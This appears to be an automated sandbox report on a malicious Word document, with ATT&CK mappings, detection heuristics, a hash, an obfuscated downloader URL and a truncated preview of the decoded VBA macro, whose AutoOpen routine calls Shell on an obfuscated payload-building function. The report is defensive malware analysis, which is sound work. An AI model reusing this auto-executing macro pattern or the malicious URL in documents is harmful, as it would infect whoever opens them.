Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro executes a Shell() command, a common technique for downloading and executing further malicious content. The obfuscated script and the presence of a suspicious URL suggest downloader or dropper functionality.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscation-6355576-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://KM5+KM5www.1001KM5+KM5parfuKM5+KM5mz.ru/lKM5+KM5jBfKS8i+S8iM5+KM5i/,KM5+KM5htKM5+KM5tp://KM5+K (in document text, OLE body)
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 211698 bytes |

SHA-256: ab35ab23504309c8a3a1489cce74daf88ab8352428ab0298ed968275ca693555

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 64 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "foVjtrtuI"
Sub AutoOpen()
EUzLFYXYi = "utbXRtzqv" + "inEUSiFKP" + "AENPTAYGm" + "OcbMmvbhR"
Shell$ XrbNVPkQN, 0
sitiUnkZo = "PkCVFvJXU" + "RfZbzLHjN" + "URAJtlNNf" + "VSjZiuMIW"
End Sub
Function XrbNVPkQN()
GMHwqvaKzhY = "DiGIr7ah12AZ1XzikZdtQbsppDJjbIESIPYhwiWlHbpOqzhFiQwHdQaQVNAAMRsfVQtmwQfGCrmomdwqVDBLLwpspHMldVZpiKtaGvHOkqEldlisOrp4aTz8zcukCR"
DQCBTEJswj = Mid(GMHwqvaKzhY, 14, 100)
qMlKnT = Array(Array(12, 73, 14, 20), Array(64, 31, 64, 97))
SPwQXqkTP = Array(Array(55, 97, 38, 72), Array(19, 75, 77, 84))
RWYFFRI = Array(Array(33, 35, 24, 85), Array(76, 87, 30, 38))
dnDTSwr = "iwTkIU8qzVOBQjjvCzkhzDJNcCzwEuGhNizvMzNasppjADpwGIACqbMdKEcLbvlEOjomjkiDlKpJOZNZMAswuDqmRTlHWBwwDkVUODPVZwRD9H"
jJjifLq = Mid(dnDTSwr, 8, 100)
ZWIZmFqVFYS = Array(Array(90, 93, 41, 78), Array(47, 20, 10, 61))
focckajbEY = Array(Array(63, 51, 93, 69), Array(34, 88, 62, 12))
vTvRfKv = Array(Array(81, 90, 67, 17), Array(90, 18, 57, 35))
YojkWDOHdz = "muknJzIbSlSWbapADUdEojSYwjJloAzwGPzmbBYCFPlvTGWQYGibBCIzmLodoWmSoTQLdCYBwazZwWFrJsNiRVwEHzAQMuOjcSHzqLnVhhfbDizPuvlnIIVMfGzUi4WBOv79uHtSZdljr1zb8"
LbnJPjVr = Mid(YojkWDOHdz, 3, 110)
vnjSNFJo = Array(Array(90, 77, 63, 33), Array(66, 18, 44, 54))
VwwSp = Array(Array(59, 58, 84, 74), Array(17, 39, 50, 40))
HcuAGLJoI = Array(Array(90, 55, 20, 24), Array(12, 59, 87, 74))
wBWWqw = "KFzTvIEASWMDdBIoBMPzfPFBwFrAkpVAZAlKPbSbXSodiHJUZsiOnlTzAvVqQDPdBLidQzYauoZNacXqvXbsLHNohlKUFbKUCLcSdjDbUdtRGIjGAGSz"
DKXiMlDjHRu = Mid(wBWWqw, 2, 104)
IfRiDsLFmdt = Array(Array(67, 67, 78, 59), Array(63, 49, 43, 61))
qwSJGiGCmGw = Array(Array(63, 88, 28, 54), Array(39, 56, 85, 33))
RnYfiRTG = Array(Array(43, 89, 54, 60), Array(28, 86, 21, 13))
oalvqKCKwWp = "J1intHJZXOi6wAIfPutnqEMSazwjXYwBfpJXADvcquTAHHIrwnoVupWQUaUAjAqLshfXjiPumotPkLKTpFjkjaHpSsDZivwqEIHackHOXtjFE4IaHoF"
dLiCdOq = Mid(oalvqKCKwWp, 22, 87)
iVNFIdV = Array(Array(24, 68, 63, 32), Array(23, 68, 54, 13))
JUidTsa = Array(Array(51, 32, 44, 32), Array(65, 78, 32, 80))
ZtoZISYXG = Array(Array(66, 11, 62, 78), Array(31, 93, 74, 75))
WjnRzYzr = "ZKfMzG99ZRrpPIzz8ZUPlwHEVzVOJNiNlzuTdzIZcVEvPnzHXEfwjnFhMsCdSfnAKcdBzvmtdNMirMpiANqEhldzrNHlwiGwhEJdmkJUVOfVZiJiraWz"
kAGfdjiwf = Mid(WjnRzYzr, 22, 77)
wCGFozzvW = Array(Array(82, 34, 72, 91), Array(42, 10, 19, 69))
JqjhjzMSJn = Array(Array(98, 45, 37, 57), Array(98, 41, 10, 60))
RCFJL = Array(Array(59, 14, 45, 90), Array(45, 51, 93, 63))
pzkPqRSF = "HcmQtjlCPlrCzbDpJLpCUPzahjLsFdEsKJlWWwmKAODzQTCXtOaJiMizWwOhUtwljwsppjSLZfBFLzKNjowrCuOzalULzjh2XRjnOVzwsQv4"
GLNFTUOj = Mid(pzkPqRSF, 6, 85)
IQRAjLJW = Array(Array(37, 90, 46, 18), Array(94, 70, 47, 25))
hvltzFCqAR = Array(Array(79, 42, 53, 19), Array(43, 59, 73, 26))
mrRGDPzXs = Array(Array(76, 33, 35, 23), Array(15, 58, 43, 94))
TpCwjF = "FRWSrKFZ1lSI9fYmDbaa7AUzQfcFdUwYcntzNtpPwuPPtlmozS8rZtizrv27Q8"
AYKZkFZ = Mid(TpCwjF, 27, 23)
BTPfPiW = Array(Array(63, 34, 83, 42), Array(65, 94, 37, 14))
lLCbiwNwLj = Array(Array(67, 31, 75, 68), Array(95, 10, 39, 77))
GdMiNMkir = Array(Array(65, 61, 69, 16), Array(28, 34, 34, 16))
iCfhRzmtN = "iiUb1DWKnoEEtvQbfbcPWKhUKaicpdVzfABaHcUCAdoWjVVJFuMTPhulawcLXEQJSFYsuqTDGZOtVLkoFZWvRBjwGPzKAJfwMiDizcPPbJNqSBQPLnFwhVsRVamfqICwuRjqHGrdJHUIotfEwkzMEjPrmmIWpkYS9CSZJmdaA9DiA8Bz"
aRftHm = Mid(iCfhRzmtN, 9, 152)
qtSviwW = Array(Array(95, 87, 51, 69), Array(84, 68, 60, 21))
zPIaI = Array(Array(87, 71, 20, 79), Array(30, 83, 77, 14))
tpVkcP = Array(Array(59, 74, 10, 20), Array(24, 67, 41, 72))
HQanEYcd = "mmBMTPvipuNTVwSPpdQjGcjorfTQrwjCwCdfHEGQACiJzsYBlFOuYmNuBzatnJdwOLUTVmIlWAjDzaqzHSimildMpjiKdNdqZivmXFjwzdXYFKwaGbmUfrOchIilIwIJWpiPfDcBmfoEOFGimDDBbJLhUSEObumPm1tZVwIVuzYNUAOR"
RZzJpUph = Mid(HQanEYcd, 10, 149)
jznrZCaJDmc = Array(Array(67, 26, 45, 15), Array(73, 71, 37, 83))
OaXHOFWhfj = Array(Array(5 ... (truncated)
```